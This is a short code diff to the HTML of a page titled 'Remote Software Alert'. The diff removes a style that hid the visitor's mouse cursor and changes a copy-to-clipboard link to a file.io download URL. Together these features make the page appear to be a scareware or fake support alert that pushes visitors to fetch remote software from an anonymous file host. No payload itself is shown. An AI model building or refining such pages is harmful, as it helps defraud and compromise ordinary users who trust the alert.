--- a/index.html
+++ b/index.html
@@ -5,11 +5,6 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Remote Software Alert</title>
     <link rel="stylesheet" type="text/css" href="styles.css">
-    <style>
-      html, body {
-          cursor: none;
-      }
-  </style>
 </head>
 <body>
   <div class="alert-container">
@@ -37,7 +32,7 @@
     });
 
     function copyToClipboard() {
-      var link = "kicklife.pro";
+      var link = "https://file.io/ExttUihRmckD";
       var tempInput = document.createElement("input");
       tempInput.setAttribute("value", link);
       document.body.appendChild(tempInput);
